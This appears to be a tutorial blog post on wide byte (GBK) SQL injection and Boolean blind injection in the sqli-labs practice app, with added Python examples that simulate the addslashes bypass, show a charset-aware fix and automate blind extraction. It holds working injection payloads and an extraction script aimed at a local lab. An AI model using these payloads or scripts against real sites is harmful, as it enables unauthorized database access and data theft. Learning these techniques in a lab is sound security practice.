Wide byte injection
First, a basic list of URL encodings:
Character | URL encoded |
---|---|
space | %20 |
' | %27 |
# | %23 |
\ | %5c |
The addslashes() function:
addslashes() returns a string with a backslash added in front of certain predefined characters.
The predefined characters are:
- single quote (')
- double quote (")
- backslash (\)
- NUL
How to get out from under addslashes():
1: Put one (or several) backslashes in front of the escaping \, so \' becomes \\'. The added backslash escapes the escaping backslash, and the ' is no longer escaped. (Caveat: this only helps when the added backslash is not itself escaped; addslashes() escapes \ as well, so on its own it does not get past addslashes().)
2: Stop the \ from being read as a backslash at all. When MySQL uses GBK encoding, two bytes are treated as one character whenever the first byte is greater than 128 (the lead-byte range of a GBK character);
a Chinese character occupies two bytes.
\' is encoded as %5c%27.
Put %df in front of the ' and it becomes %df\',
that is %df%5c%27. After GBK decoding,
%df%5c is read as the single character 運, leaving a bare ' behind: the escaping is successfully bypassed.
Experiment
Experimental environment: sqlilabs-less-32
My local target built for the wide byte injection problem somehow could not be used, so I set up a sqlilabs virtual machine, which took some time. Cried.
We begin testing! ! !
?id=1%27--+
This shows the addslashes() function is in use; try %df:
?id=1%df%27--+
This shows GBK encoding is in use, and injection is possible.
?id=-1%df%27 union select 1,2,3--+
One thing to note for the union injection: the single quotes in where table_name='' cannot be used (they would be escaped), so use another method: hex.
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
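To make the mechanism from the addslashes() section and the %df%27 probe above concrete without a MySQL server, here is an added Python example (not code from the original post). It imitates addslashes() byte by byte, shows what the MySQL parser sees when the escaped bytes are decoded as GBK versus UTF-8, and contrasts it with a charset-aware escape (an assumed fix, not something the post describes) that decodes the input with the real connection charset before escaping. The payload bytes are the page's own `1%df%27`; the `addslashes`, `mysql_sees`, `unescaped_quote_count` and `escape_charset_aware` names are mine.

```python
from urllib.parse import unquote_to_bytes


def addslashes(data: bytes) -> bytes:
    """Byte-wise imitation of PHP's addslashes(): a backslash goes in front of
    ' " \ and NUL. It knows nothing about the database charset, which is the
    weakness the wide byte trick exploits."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):   # ' " \ NUL
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def mysql_sees(escaped: bytes, charset: str) -> str:
    """The text MySQL's parser works on once the escaped bytes are decoded with
    the connection charset (undecodable bytes become U+FFFD here)."""
    return escaped.decode(charset, errors="replace")


def unescaped_quote_count(text: str) -> int:
    """Number of single quotes NOT preceded by a backslash, i.e. quotes that can
    close the string literal and let the rest of the payload run as SQL."""
    count = i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2          # a backslash escapes the character after it
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def escape_charset_aware(raw: bytes, charset: str):
    """Assumed hardened alternative: decode with the real connection charset
    first and escape characters, not bytes, so a lone 0xdf lead byte can never
    swallow the escaping backslash. Returns None for bytes that are not valid in
    that charset (b"1\\xdf'" is rejected, because 0x27 is not a GBK trail byte)."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    text = (text.replace("\\", "\\\\").replace("'", "\\'")
                .replace('"', '\\"').replace("\x00", "\\0"))
    return text.encode(charset)


if __name__ == "__main__":
    payload = unquote_to_bytes("1%df%27")     # the ?id=1%df%27 parameter from the post
    escaped = addslashes(payload)             # bytes 31 df 5c 27, i.e. 1 %df %5c %27
    for cs in ("gbk", "utf-8"):
        view = mysql_sees(escaped, cs)
        print(cs, repr(view), "unescaped quotes:", unescaped_quote_count(view))
    print("charset-aware escape of the same bytes:", escape_charset_aware(payload, "gbk"))
```

Under GBK the decoded text is `1運'` with one live quote; under UTF-8 the 0xdf byte is just an invalid lone byte, the backslash survives and the quote stays escaped, which is why the trick depends on the server-side charset and not on the client.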
Scripting
Learning to write a python script: sqlmap is not a panacea. After a morning of study I found there is a lot to learn in the requests library; I will take it slowly.
Experimental environment: sqlilabs-less-8
To write the simplest Boolean blind injection script, the python requests library is needed first; install it with pip.
import requests

dic = 'abcdefghijklmnopqrstuvwxyz'   # candidate characters; add digits and _ if the name needs them
database = ''
for x in range(1, 10):               # position inside database(); extend the range for longer names
    for i in dic:
        url = "http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),%d,1)='%c'--+" % (x, i)
        try:
            response = requests.get(url, timeout=5)
            # Less-8 prints this marker only when the injected condition is true
            if response.text.find('You are in...........') != -1:
                database = database + i
                print(database)
                break
        except Exception as e:
            pass
print(database)
The key part is the check: if 'You are in...' is found (find() does not return -1), the statements below it run; if it is not found (find() returns -1), the body of the if is skipped.
if response.text.find('You are in...........') != -1:
For the next step, change the url so it extracts table names instead:
url = "http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),%d,1)='%c'--+" % (x, i)
limit 0,1 can also be put in a loop; I do not demonstrate that here. In short, python scripts are more flexible to use, and it is worth learning to write them well.
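As an added example (not the post's script), here is the general form of the Boolean blind extractor above: the page check is separated into an oracle function, one routine recovers any SQL expression character by character, and a second one does the `limit 0,1` loop over `information_schema.tables` that the post leaves out, stopping when a row comes back empty. The live oracle assumes a sqli-labs Less-8 at a URL you pass in; the fake oracle and the database name and table list it answers with are constructed here so the code runs offline. All function names are mine.

```python
import re

TRUE_MARKER = "You are in..........."   # text Less-8 shows only when the injected condition is true
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"


def make_http_oracle(base_url, timeout=5):
    """Oracle against a live Less-8 (assumed base_url such as
    http://127.0.0.1/sqlilabs/Less-8/): True when the page shows TRUE_MARKER."""
    import requests   # only the live oracle needs it

    def oracle(condition):
        url = base_url + "?id=1' and " + condition + "--+"
        return TRUE_MARKER in requests.get(url, timeout=timeout).text
    return oracle


def extract(oracle, expr, max_len=32):
    """Recover the string value of SQL expression `expr` one character at a time:
    for each position ask the oracle which CHARSET character sits there; when
    nothing matches, the end of the string was reached."""
    value = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(f"substr(({expr}),{pos},1)='{ch}'"):
                value += ch
                break
        else:
            break
    return value


def extract_tables(oracle, schema, max_rows=50):
    """The limit 0,1 loop: walk the rows of information_schema.tables until a
    row is empty (substr() of a NULL row never equals any character)."""
    tables = []
    for row in range(max_rows):
        expr = (f"select table_name from information_schema.tables "
                f"where table_schema='{schema}' limit {row},1")
        name = extract(oracle, expr)
        if not name:
            break
        tables.append(name)
    return tables


def make_fake_oracle(db_name, tables):
    """Constructed offline stand-in for the lab page: understands exactly the two
    expression shapes extract()/extract_tables() emit and answers from the
    constructed db_name / tables instead of a real database."""
    probe_re = re.compile(r"substr\(\((.*)\),(\d+),1\)='(.)'")
    rows_re = re.compile(r"select table_name from information_schema\.tables "
                         r"where table_schema='(\w+)' limit (\d+),1")

    def oracle(condition):
        m = probe_re.fullmatch(condition)
        if not m:
            return False
        expr, pos, ch = m.group(1), int(m.group(2)), m.group(3)
        if expr == "database()":
            value = db_name
        else:
            r = rows_re.fullmatch(expr)
            if not r or r.group(1) != db_name or int(r.group(2)) >= len(tables):
                return False          # no such row: NULL compares false
            value = tables[int(r.group(2))]
        return pos <= len(value) and value[pos - 1] == ch
    return oracle


if __name__ == "__main__":
    # Swap in make_http_oracle("http://127.0.0.1/sqlilabs/Less-8/") to run against the lab.
    oracle = make_fake_oracle("security", ["emails", "referers", "uagents", "users"])
    print("database:", extract(oracle, "database()"))
    print("tables:", extract_tables(oracle, "security"))
```

One caveat when pointing this at a real server: with MySQL's default case-insensitive collations `substr(...)='a'` also matches `A`, so CHARSET only needs one case, but if the exact case matters compare with `binary substr(...)='a'` and add uppercase letters.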